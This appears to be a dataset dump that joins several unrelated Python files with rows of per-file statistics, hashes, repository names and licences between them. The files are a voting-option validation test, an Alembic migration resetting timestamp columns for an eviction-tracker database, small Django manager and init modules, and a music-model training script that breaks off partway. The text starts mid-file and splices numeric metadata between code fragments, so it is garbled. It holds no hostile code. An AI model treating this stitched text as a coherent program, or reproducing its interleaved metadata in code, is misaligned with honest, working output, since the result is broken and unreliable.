def test_options_invalid(self):
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'options is not a dict:',
validate.options, (7,))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'An option name is not a str:',
validate.options, ({('junk',): True},))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'The option \'stop_at_majority\' must be True or False.',
validate.options, ({'stop_at_majority': 1},))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid option value type:',
validate.options, ({'alternative_defeats': True},))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid per-round option value:',
validate.options, ({'alternative_defeats': ('Z',)},))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid per-round option value:',
validate.options, ({'alternative_defeats': ['Z']},))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid per-round option value:',
validate.options, ({'alternative_defeats': ' Z'},))
_test_aids.assertRaises_with_message(self, errors.RcvValueError,
'Invalid option name:',
validate.options, ({'no_skipped_rankings': True},))
| 48.116477
| 77
| 0.588711
| 2,140
| 16,937
| 4.47757
| 0.070561
| 0.134627
| 0.182425
| 0.105197
| 0.847944
| 0.822271
| 0.786788
| 0.746191
| 0.725423
| 0.693697
| 0
| 0.023715
| 0.213261
| 16,937
| 351
| 78
| 48.253561
| 0.695385
| 0.007203
| 0
| 0.406154
| 0
| 0.024615
| 0.188136
| 0
| 0
| 0
| 0
| 0
| 0.393846
| 1
| 0.052308
| false
| 0
| 0.024615
| 0.003077
| 0.083077
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f4da2e15d8f1162f37966ce7139e4d72862348b
| 5,200
|
py
|
Python
|
migrations/versions/f019e4f1d25c_.py
|
gregziegan/eviction-tracker
|
4db4bacb9675f985cf2f4a747855491e9036ad28
|
[
"BSD-3-Clause"
] | 5
|
2021-09-15T08:06:59.000Z
|
2022-01-26T21:25:50.000Z
|
migrations/versions/f019e4f1d25c_.py
|
gregziegan/eviction-tracker
|
4db4bacb9675f985cf2f4a747855491e9036ad28
|
[
"BSD-3-Clause"
] | 18
|
2022-01-14T17:15:53.000Z
|
2022-02-14T07:33:53.000Z
|
migrations/versions/f019e4f1d25c_.py
|
thebritican/eviction-tracker
|
1e34d509b0410d61de6abd6be521c53951fa038a
|
[
"BSD-3-Clause"
] | 1
|
2021-09-15T01:46:57.000Z
|
2021-09-15T01:46:57.000Z
|
"""empty message
Revision ID: f019e4f1d25c
Revises: a72b9feecf0d
Create Date: 2021-07-29 11:41:16.577221
"""
from alembic import op
import sqlalchemy as sa
from datetime import datetime
# revision identifiers, used by Alembic.
revision = 'f019e4f1d25c'
down_revision = 'a72b9feecf0d'
branch_labels = None
depends_on = None
now = sa.text('now()')
bad_now = str(datetime.now())
def upgrade():
op.drop_column('phone_number_verifications', 'updated_at')
op.drop_column('phone_number_verifications', 'created_at')
op.drop_column('judges', 'updated_at')
op.drop_column('judges', 'created_at')
op.drop_column('districts', 'updated_at')
op.drop_column('districts', 'created_at')
op.drop_column('detainer_warrants', 'updated_at')
op.drop_column('detainer_warrants', 'created_at')
op.drop_column('defendants', 'updated_at')
op.drop_column('defendants', 'created_at')
op.drop_column('courtrooms', 'updated_at')
op.drop_column('courtrooms', 'created_at')
op.drop_column('attorneys', 'updated_at')
op.drop_column('attorneys', 'created_at')
op.add_column('attorneys', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('attorneys', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('courtrooms', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('courtrooms', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('defendants', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('defendants', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('detainer_warrants', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('detainer_warrants', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('districts', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('districts', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('judges', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('judges', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('phone_number_verifications', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=now))
op.add_column('phone_number_verifications', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=now))
def downgrade():
op.drop_column('phone_number_verifications', 'updated_at')
op.drop_column('phone_number_verifications', 'created_at')
op.drop_column('judges', 'updated_at')
op.drop_column('judges', 'created_at')
op.drop_column('districts', 'updated_at')
op.drop_column('districts', 'created_at')
op.drop_column('detainer_warrants', 'updated_at')
op.drop_column('detainer_warrants', 'created_at')
op.drop_column('defendants', 'updated_at')
op.drop_column('defendants', 'created_at')
op.drop_column('courtrooms', 'updated_at')
op.drop_column('courtrooms', 'created_at')
op.drop_column('attorneys', 'updated_at')
op.drop_column('attorneys', 'created_at')
op.add_column('attorneys', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('attorneys', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('courtrooms', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('courtrooms', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('defendants', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('defendants', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('detainer_warrants', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('detainer_warrants', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('districts', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('districts', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('judges', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('judges', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('phone_number_verifications', sa.Column(
'created_at', sa.DateTime(), nullable=False, server_default=bad_now))
op.add_column('phone_number_verifications', sa.Column(
'updated_at', sa.DateTime(), nullable=False, server_default=bad_now))
| 47.272727
| 77
| 0.705192
| 683
| 5,200
| 5.102489
| 0.087848
| 0.048207
| 0.096413
| 0.160689
| 0.911908
| 0.911908
| 0.911908
| 0.911908
| 0.911908
| 0.911908
| 0
| 0.0094
| 0.140769
| 5,200
| 109
| 78
| 47.706422
| 0.770591
| 0.027308
| 0
| 0.884211
| 0
| 0
| 0.254455
| 0.041188
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021053
| false
| 0
| 0.031579
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f6c23d7b3896037963ace7094fdb7e90aaeb8c0
| 95
|
py
|
Python
|
mathstropy/__init__.py
|
mathstronauts/mathstropy
|
f9230c1ee15b33129cd6a49392b2a01f5c5277d8
|
[
"MIT"
] | null | null | null |
mathstropy/__init__.py
|
mathstronauts/mathstropy
|
f9230c1ee15b33129cd6a49392b2a01f5c5277d8
|
[
"MIT"
] | null | null | null |
mathstropy/__init__.py
|
mathstronauts/mathstropy
|
f9230c1ee15b33129cd6a49392b2a01f5c5277d8
|
[
"MIT"
] | null | null | null |
from .miscellaneous_functions import randomword
from .miscellaneous_functions import wordmask
| 23.75
| 47
| 0.884211
| 10
| 95
| 8.2
| 0.6
| 0.414634
| 0.634146
| 0.780488
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094737
| 95
| 3
| 48
| 31.666667
| 0.953488
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6f7104f9ad628e3d69200a5dea25102ac156d3e9
| 392
|
py
|
Python
|
jp_stations/managers.py
|
t-hiroyoshi/django-japanese-stations
|
f27611086391498f31b9f5188c937c238bc97f3a
|
[
"MIT"
] | 1
|
2018-02-19T16:17:59.000Z
|
2018-02-19T16:17:59.000Z
|
jp_stations/managers.py
|
t-hiroyoshi/django-japanese-stations
|
f27611086391498f31b9f5188c937c238bc97f3a
|
[
"MIT"
] | null | null | null |
jp_stations/managers.py
|
t-hiroyoshi/django-japanese-stations
|
f27611086391498f31b9f5188c937c238bc97f3a
|
[
"MIT"
] | null | null | null |
from django.db import models
class StationManager(models.Manager):
def search_name(self, name):
return self.filter(name__icontains=name)
class LineManager(models.Manager):
def search_name(self, name):
return self.filter(name__icontains=name)
class CompanyManager(models.Manager):
def search_name(self, name):
return self.filter(name__icontains=name)
| 23.058824
| 48
| 0.734694
| 50
| 392
| 5.58
| 0.34
| 0.139785
| 0.172043
| 0.236559
| 0.756272
| 0.756272
| 0.756272
| 0.756272
| 0.756272
| 0.756272
| 0
| 0
| 0.170918
| 392
| 16
| 49
| 24.5
| 0.858462
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0
| 0.1
| 0.3
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
48a934b2a9bfdd7aa49e0353c271d0c6918acabb
| 351
|
py
|
Python
|
__init__.py
|
npielawski/octopytorch
|
6e65f23bcdf7bab5ec5c3e869cb4af8f2b53d578
|
[
"MIT"
] | 7
|
2021-05-07T21:12:01.000Z
|
2022-03-11T08:26:07.000Z
|
__init__.py
|
npielawski/octopytorch
|
6e65f23bcdf7bab5ec5c3e869cb4af8f2b53d578
|
[
"MIT"
] | 1
|
2021-10-14T09:23:47.000Z
|
2021-10-14T09:23:47.000Z
|
__init__.py
|
npielawski/octopytorch
|
6e65f23bcdf7bab5ec5c3e869cb4af8f2b53d578
|
[
"MIT"
] | 1
|
2021-08-03T02:29:20.000Z
|
2021-08-03T02:29:20.000Z
|
from octopytorch.models.modulebank import (
ModuleType,
ModuleBankType,
DEFAULT_MODULE_BANK,
UPSAMPLE2D_NEAREST,
UPSAMPLE2D_PIXELSHUFFLE,
UPSAMPLE2D_TRANPOSE,
)
__all__ = [
"ModuleType",
"ModuleBankType",
"DEFAULT_MODULE_BANK",
"UPSAMPLE2D_NEAREST",
"UPSAMPLE2D_PIXELSHUFFLE",
"UPSAMPLE2D_TRANPOSE",
]
| 19.5
| 43
| 0.712251
| 28
| 351
| 8.428571
| 0.535714
| 0.20339
| 0.262712
| 0.313559
| 0.830508
| 0.830508
| 0.830508
| 0.830508
| 0.830508
| 0.830508
| 0
| 0.021352
| 0.19943
| 351
| 17
| 44
| 20.647059
| 0.818505
| 0
| 0
| 0
| 0
| 0
| 0.293447
| 0.065527
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0625
| 0
| 0.0625
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
48ab28c92b70cdfd7e651f132bdaa744b229dec0
| 24,277
|
py
|
Python
|
train/train_nn.py
|
abwilf/tonicnet_edited
|
cee5c254e33d4c3c2d7bcd1c142902b34c076bcb
|
[
"Apache-2.0"
] | null | null | null |
train/train_nn.py
|
abwilf/tonicnet_edited
|
cee5c254e33d4c3c2d7bcd1c142902b34c076bcb
|
[
"Apache-2.0"
] | null | null | null |
train/train_nn.py
|
abwilf/tonicnet_edited
|
cee5c254e33d4c3c2d7bcd1c142902b34c076bcb
|
[
"Apache-2.0"
] | null | null | null |
import time, os
import math
import matplotlib.pyplot as plt
import torch
from torch import save, set_grad_enabled, sum, max
from torch import optim, cuda, load, device
from torch.nn.utils import clip_grad_norm_
from preprocessing.nn_dataset import get_data_set, TOTAL_BATCHES, TRAIN_BATCHES, N_TOKENS
from train.models import CrossEntropyTimeDistributedLoss
from train.models import TonicNet, Transformer_Model
from train.external import RAdam, Lookahead, OneCycleLR
import json
import numpy as np
"""
File containing functions which train various neural networks defined in train.models
"""
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def save_json(file_stub, obj):
filename = file_stub
for k,v in obj.items():
if isinstance(v, list):
obj[k] = np.array(v)
if obj[k].dtype==np.float32:
obj[k] = obj[k].astype(np.float64)
with open(filename, 'w') as f:
json.dump(obj, f, cls=NumpyEncoder, indent=4)
CV_PHASES = ['train', 'val']
TRAIN_ONLY_PHASES = ['train']
# MARK:- TonicNet
def TonicNet_lr_finder(train_emb_freq=3000, load_path=''):
train_TonicNet(epochs=3,
save_model=False,
load_path=load_path,
shuffle_batches=True,
num_batches=TRAIN_BATCHES,
val=False,
train_emb_freq=train_emb_freq,
lr_range_test=True)
def TonicNet_sanity_test(num_batches=1, train_emb_freq=3000, load_path=''):
train_TonicNet(epochs=200,
save_model=False,
load_path=load_path,
shuffle_batches=False,
num_batches=num_batches,
val=1,
train_emb_freq=train_emb_freq,
lr_range_test=False,
sanity_test=True)
def train_TonicNet(epochs,
save_model=True,
load_path='',
shuffle_batches=False,
num_batches=TOTAL_BATCHES,
val=True,
train_emb_freq=1,
lr_range_test=False,
sanity_test=False):
model = TonicNet(nb_tags=N_TOKENS, z_dim=32, nb_layers=3, nb_rnn_units=256, dropout=0.3)
if load_path != '':
try:
if cuda.is_available():
model.load_state_dict(load(load_path)['model_state_dict'])
else:
model.load_state_dict(load(load_path, map_location=device('cpu'))['model_state_dict'])
print("loded params from", load_path)
except:
raise ImportError(f'No file located at {load_path}, could not load parameters')
print(model)
if cuda.is_available():
model.cuda()
base_lr = 0.2
max_lr = 0.2
if lr_range_test:
base_lr = 0.000003
max_lr = 0.5
step_size = 3 * min(TRAIN_BATCHES, num_batches)
if sanity_test:
base_optim = RAdam(model.parameters(), lr=base_lr)
optimiser = Lookahead(base_optim, k=5, alpha=0.5)
else:
optimiser = optim.SGD(model.parameters(), base_lr)
criterion = CrossEntropyTimeDistributedLoss()
print(criterion)
print(f"min lr: {base_lr}, max_lr: {max_lr}, stepsize: {step_size}")
if not sanity_test and not lr_range_test:
scheduler = OneCycleLR(optimiser, max_lr,
epochs=60, steps_per_epoch=TRAIN_BATCHES, pct_start=0.3,
anneal_strategy='cos', cycle_momentum=True, base_momentum=0.8,
max_momentum=0.95, div_factor=25.0, final_div_factor=1000.0,
last_epoch=-1)
elif lr_range_test:
lr_lambda = lambda x: math.exp(x * math.log(max_lr / base_lr) / (epochs * num_batches))
scheduler = optim.lr_scheduler.LambdaLR(optimiser, lr_lambda)
best_val_loss = 100.0
if lr_range_test:
lr_find_loss = []
lr_find_lr = []
itr = 0
smoothing = 0.05
if val:
phases = CV_PHASES
else:
phases = TRAIN_ONLY_PHASES
results = {
'all_val_losses': [],
'all_val_masked_losses': [],
'all_val_tot_losses': [],
'all_val_accs': [],
'all_val_masked_accs': [],
'all_val_tot_accs': []
}
for epoch in range(epochs):
start = time.time()
pr_interval = 50
print(f'Beginning EPOCH {epoch + 1}')
for phase in phases:
count = 0
batch_count = 0
batch_count_masked = 0
batch_count_tot = 0
loss_epoch = 0
loss_epoch_masked = 0
loss_epoch_all = 0
running_accuracy = 0.0
running_masked_acc = 0.0 # eval
running_tot_acc = 0.0 # eval
running_batch_count = 0
print_loss_batch = 0.0 # Reset on print
print_acc_batch = 0.0 # Reset on print
print(f'\n\tPHASE: {phase}')
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
for x, y, psx, i, c, mask in get_data_set(phase, shuffle_batches=shuffle_batches, return_I=1):
Y = y
model.zero_grad()
if phase == 'train' and (epoch > -1 or load_path != ''):
if train_emb_freq < 1000:
train_emb = ((count % train_emb_freq) == 0)
else:
train_emb = False
else:
train_emb = False
with set_grad_enabled(phase == 'train'):
mask = mask.to(torch.int)
y_hat = model(x*mask, z=i*mask.squeeze(), train_embedding=train_emb)
# training: use only voices that are NOT masked
mask = mask.to(torch.bool)
if phase=='train':
masked_yhat = y_hat.squeeze().masked_select(mask.squeeze()[:,None].expand(-1, y_hat.shape[-1])).reshape(-1, y_hat.shape[-1])[None,:]
masked_y = Y.squeeze().masked_select(mask.squeeze())[None,:]
loss = criterion(masked_yhat, masked_y, )
_, preds = max(masked_yhat, 2)
running_accuracy += sum(preds == masked_y).item()
print_acc_batch += sum(preds == masked_y).item()
loss_epoch += loss.item()
print_loss_batch += loss.item()
batch_count += masked_yhat.shape[1]
running_batch_count += masked_yhat.shape[1]
else:
# evaluation: use only the voices that are NOT masked (used for validation selection)
masked_yhat = y_hat.squeeze().masked_select(mask.squeeze()[:,None].expand(-1, y_hat.shape[-1])).reshape(-1, y_hat.shape[-1])[None,:]
masked_y = Y.squeeze().masked_select(mask.squeeze())[None,:]
loss = criterion(masked_yhat, masked_y, )
_, preds = max(masked_yhat, 2)
running_accuracy += sum(preds == masked_y).item()
print_acc_batch += sum(preds == masked_y).item()
loss_epoch += loss.item()
print_loss_batch += loss.item()
batch_count += masked_yhat.shape[1]
running_batch_count += masked_yhat.shape[1]
# evaluation: use only the voices that ARE masked
mask = ~(mask.reshape(-1))
masked_yhat = y_hat.squeeze().masked_select(mask.squeeze()[:,None].expand(-1, y_hat.shape[-1])).reshape(-1, y_hat.shape[-1])[None,:]
masked_y = Y.squeeze().masked_select(mask.squeeze())[None,:]
loss_masked = criterion(masked_yhat, masked_y)
_, preds = max(masked_yhat, 2)
running_masked_acc += sum(preds == masked_y).item()
loss_epoch_masked += loss_masked.item()
batch_count_masked += masked_yhat.shape[1]
# evaluation: use all voices
mask = torch.ones_like(mask)
masked_yhat = y_hat.squeeze().masked_select(mask.squeeze()[:,None].expand(-1, y_hat.shape[-1])).reshape(-1, y_hat.shape[-1])[None,:]
masked_y = Y.squeeze().masked_select(mask.squeeze())[None,:]
loss_all = criterion(masked_yhat, masked_y)
_, preds = max(masked_yhat, 2)
running_tot_acc += sum(preds == masked_y).item()
loss_epoch_all += loss_all.item()
batch_count_tot += masked_yhat.shape[1]
count += 1
if phase == 'train':
loss.backward()
clip_grad_norm_(model.parameters(), 5)
optimiser.step()
if not sanity_test:
scheduler.step()
if lr_range_test:
lr_step = optimiser.state_dict()["param_groups"][0]["lr"]
lr_find_lr.append(lr_step)
# smooth the loss
if itr == 0:
lr_find_loss.append(min(loss, 7))
else:
loss = smoothing * min(loss, 7) + (1 - smoothing) * lr_find_loss[-1]
lr_find_loss.append(loss)
itr += 1
# print loss for recent set of batches
if count % pr_interval == 0:
ave_loss = print_loss_batch/pr_interval
ave_acc = 100 * float(print_acc_batch)/running_batch_count
print_acc_batch = 0
running_batch_count = 0
print('\t\t[%d] loss: %.3f, acc: %.3f' % (count, ave_loss, ave_acc))
print_loss_batch = 0
# break
if count == num_batches:
break
# calculate loss and accuracy for phase
if phase=='train':
# calculate loss and accuracy for phase
ave_loss_epoch = loss_epoch/count
epoch_acc = 100 * float(running_accuracy) / batch_count
print('\tfinished %s phase [%d] loss: %.3f, acc: %.3f' % (phase, epoch + 1, ave_loss_epoch, epoch_acc))
else:
# not masked
val_loss = loss_epoch/count
epoch_acc = 100 * float(running_accuracy) / batch_count
# masked
val_loss_masked = loss_epoch_masked/count
epoch_acc_masked = 100 * float(running_masked_acc) / batch_count_masked
# all
val_loss_all = loss_epoch_all/count
epoch_acc_all = 100 * float(running_tot_acc) / batch_count_tot
results['all_val_losses'].append(val_loss)
results['all_val_masked_losses'].append(val_loss_masked)
results['all_val_tot_losses'].append(val_loss_all)
results['all_val_accs'].append(epoch_acc)
results['all_val_masked_accs'].append(epoch_acc_masked)
results['all_val_tot_accs'].append(epoch_acc_all)
print(f'\t Validation perf (on train subset of features): {val_loss:.3f}, {epoch_acc:.3f}')
print(f'\t Validation perf (on masked subset): {val_loss_masked:.3f}, {epoch_acc_masked:.3f}')
print(f'\t Validation perf (on total subset): {val_loss_all:.3f}, {epoch_acc_all:.3f}')
save_json('tonicnet_results.json', results)
# MARK:- Transformer
def Transformer_lr_finder(load_path=''):
train_Transformer(epochs=3,
save_model=False,
load_path=load_path,
shuffle_batches=True,
num_batches=TRAIN_BATCHES,
val=False,
lr_range_test=True)
def Transformer_sanity_test(num_batches=1, load_path=''):
train_Transformer(epochs=1000,
save_model=0,
load_path=load_path,
shuffle_batches=False,
num_batches=num_batches,
val=1,
lr_range_test=False,
sanity_test=True)
def train_Transformer(epochs,
save_model=True,
load_path='',
shuffle_batches=False,
num_batches=TOTAL_BATCHES,
val=True,
lr_range_test=False,
sanity_test=False):
model = Transformer_Model(nb_tags=N_TOKENS, nb_layers=5, emb_dim=256, dropout=0.1, pe_dim=256)
if load_path != '':
try:
if cuda.is_available():
model.load_state_dict(load(load_path)['model_state_dict'])
else:
model.load_state_dict(load(load_path, map_location=device('cpu'))['model_state_dict'])
print("loded params from", load_path)
except:
raise ImportError(f'No file located at {load_path}, could not load parameters')
print(model)
if cuda.is_available():
model.cuda()
base_lr = 0.06
max_lr = 0.06
if lr_range_test:
base_lr = 0.000003
max_lr = 0.3
step_size = 3 * min(TRAIN_BATCHES, num_batches)
if sanity_test:
base_optim = RAdam(model.parameters(), lr=base_lr/100)
optimiser = Lookahead(base_optim, k=5, alpha=0.5)
else:
optimiser = optim.SGD(model.parameters(), base_lr)
criterion = CrossEntropyTimeDistributedLoss()
print(criterion)
print(f"min lr: {base_lr}, max_lr: {max_lr}, stepsize: {step_size}")
if not sanity_test and not lr_range_test:
scheduler = OneCycleLR(optimiser, max_lr,
epochs=30, steps_per_epoch=TRAIN_BATCHES, pct_start=0.3,
anneal_strategy='cos', cycle_momentum=True, base_momentum=0.8,
max_momentum=0.95, div_factor=100.0, final_div_factor=1000.0,
last_epoch=-1)
elif lr_range_test:
lr_lambda = lambda x: math.exp(x * math.log(max_lr / base_lr) / (epochs * TRAIN_BATCHES))
scheduler = optim.lr_scheduler.LambdaLR(optimiser, lr_lambda)
best_val_loss = 100.0
step = 0
if lr_range_test:
lr_find_loss = []
lr_find_lr = []
itr = 0
smoothing = 0.05
if val:
phases = CV_PHASES
else:
phases = TRAIN_ONLY_PHASES
results = {
'all_val_losses': [],
'all_val_masked_losses': [],
'all_val_tot_losses': [],
'all_val_accs': [],
'all_val_masked_accs': [],
'all_val_tot_accs': []
}
for epoch in range(epochs):
start = time.time()
pr_interval = 50
print(f'Beginning EPOCH {epoch + 1}')
for phase in phases:
phase_loss = None
model.zero_grad()
count = 0
batch_count = 0
batch_count_masked = 0
batch_count_tot = 0
loss_epoch = 0
loss_epoch_masked = 0
loss_epoch_all = 0
running_accuracy = 0.0
running_masked_acc = 0.0 # eval
running_tot_acc = 0.0 # eval
running_batch_count = 0
print_loss_batch = 0.0 # Reset on print
print_acc_batch = 0.0 # Reset on print
print(f'\n\tPHASE: {phase}')
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
for x, y, psx, i, c, mask in get_data_set(phase, shuffle_batches=shuffle_batches, return_I=1):
Y = y
model.seq_len = x.shape[1]
with set_grad_enabled(phase == 'train'):
# MASK input - turn into zeros where mask
mask = mask.to(torch.int)
y_hat = model(x*mask, psx*mask.squeeze(-1))
y_hat = y_hat.view(1, -1, N_TOKENS)
# training: use only voices that are NOT masked
mask = mask.to(torch.bool)
if phase=='train':
masked_yhat = y_hat.squeeze().masked_select(mask.squeeze()[:,None].expand(-1, y_hat.shape[-1])).reshape(-1, y_hat.shape[-1])[None,:]
masked_y = Y.squeeze().masked_select(mask.squeeze())[None,:]
loss = criterion(masked_yhat, masked_y, )
_, preds = max(masked_yhat, 2)
running_accuracy += sum(preds == masked_y).item()
print_acc_batch += sum(preds == masked_y).item()
loss_epoch += loss.item()
print_loss_batch += loss.item()
batch_count += masked_yhat.shape[1]
running_batch_count += masked_yhat.shape[1]
else:
# evaluation: use only the voices that are NOT masked (used for validation selection)
masked_yhat = y_hat.squeeze().masked_select(mask.squeeze()[:,None].expand(-1, y_hat.shape[-1])).reshape(-1, y_hat.shape[-1])[None,:]
masked_y = Y.squeeze().masked_select(mask.squeeze())[None,:]
loss = criterion(masked_yhat, masked_y, )
_, preds = max(masked_yhat, 2)
running_accuracy += sum(preds == masked_y).item()
print_acc_batch += sum(preds == masked_y).item()
loss_epoch += loss.item()
print_loss_batch += loss.item()
batch_count += masked_yhat.shape[1]
running_batch_count += masked_yhat.shape[1]
# evaluation: use only the voices that ARE masked
mask = ~(mask.reshape(-1))
masked_yhat = y_hat.squeeze().masked_select(mask.squeeze()[:,None].expand(-1, y_hat.shape[-1])).reshape(-1, y_hat.shape[-1])[None,:]
masked_y = Y.squeeze().masked_select(mask.squeeze())[None,:]
loss_masked = criterion(masked_yhat, masked_y)
_, preds = max(masked_yhat, 2)
running_masked_acc += sum(preds == masked_y).item()
loss_epoch_masked += loss_masked.item()
batch_count_masked += masked_yhat.shape[1]
# evaluation: use all voices
mask = torch.ones_like(mask)
masked_yhat = y_hat.squeeze().masked_select(mask.squeeze()[:,None].expand(-1, y_hat.shape[-1])).reshape(-1, y_hat.shape[-1])[None,:]
masked_y = Y.squeeze().masked_select(mask.squeeze())[None,:]
loss_all = criterion(masked_yhat, masked_y)
_, preds = max(masked_yhat, 2)
running_tot_acc += sum(preds == masked_y).item()
loss_epoch_all += loss_all.item()
batch_count_tot += masked_yhat.shape[1]
if phase_loss is None:
phase_loss = loss
else:
phase_loss += loss
count += 1
if count % 1 == 0:
if phase == 'train':
phase_loss.backward()
clip_grad_norm_(model.parameters(), 5)
optimiser.step()
step += 1
if not sanity_test:
scheduler.step()
phase_loss = None
model.zero_grad()
if lr_range_test:
lr_step = optimiser.state_dict()["param_groups"][0]["lr"]
lr_find_lr.append(lr_step)
# smooth the loss
if itr == 0:
lr_find_loss.append(min(loss, 4))
else:
loss = smoothing * min(loss, 4) + (1 - smoothing) * lr_find_loss[-1]
lr_find_loss.append(loss)
itr += 1
# print loss for recent set of batches
if count % pr_interval == 0:
ave_loss = print_loss_batch/pr_interval
ave_acc = 100 * print_acc_batch/running_batch_count
print_acc_batch = 0
running_batch_count = 0
print('\t\t[%d] loss: %.3f, acc: %.3f' % (count, ave_loss, ave_acc))
print_loss_batch = 0
# break
if count == num_batches:
break
if phase=='train':
# calculate loss and accuracy for phase
ave_loss_epoch = loss_epoch/count
epoch_acc = 100 * float(running_accuracy) / batch_count
print('\tfinished %s phase [%d] loss: %.3f, acc: %.3f' % (phase, epoch + 1, ave_loss_epoch, epoch_acc))
else:
# not masked
val_loss = loss_epoch/count
epoch_acc = 100 * float(running_accuracy) / batch_count
# masked
val_loss_masked = loss_epoch_masked/count
epoch_acc_masked = 100 * float(running_masked_acc) / batch_count_masked
# all
val_loss_all = loss_epoch_all/count
epoch_acc_all = 100 * float(running_tot_acc) / batch_count_tot
results['all_val_losses'].append(val_loss)
results['all_val_masked_losses'].append(val_loss_masked)
results['all_val_tot_losses'].append(val_loss_all)
results['all_val_accs'].append(epoch_acc)
results['all_val_masked_accs'].append(epoch_acc_masked)
results['all_val_tot_accs'].append(epoch_acc_all)
print(f'\t Validation perf (on train subset of features): {val_loss:.3f}, {epoch_acc:.3f}')
print(f'\t Validation perf (on masked subset): {val_loss_masked:.3f}, {epoch_acc_masked:.3f}')
print(f'\t Validation perf (on total subset): {val_loss_all:.3f}, {epoch_acc_all:.3f}')
print('\n\ttime:', __time_since(start), '\n')
save_json('transformer_results.json', results)
def __save_model(epoch, ave_loss_epoch, model, model_name, acc):
test = os.listdir('eval')
for item in test:
if item.endswith(".pt"):
os.remove(os.path.join('eval', item))
path_loss = round(ave_loss_epoch, 3)
path_acc = '%.3f' % acc
path = f'eval/{model_name}_epoch-{epoch}_loss-{path_loss}_acc-{path_acc}.pt'
save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'loss': path_loss
}, path)
print("\tSAVED MODEL TO:", path)
def __time_since(t):
now = time.time()
s = now - t
return '%s' % (__as_minutes(s))
def __as_minutes(s):
m = math.floor(s / 60)
s -= m * 60
return '%dm %ds' % (m, s)
| 40.461667
| 156
| 0.515838
| 2,789
| 24,277
| 4.203657
| 0.103263
| 0.030706
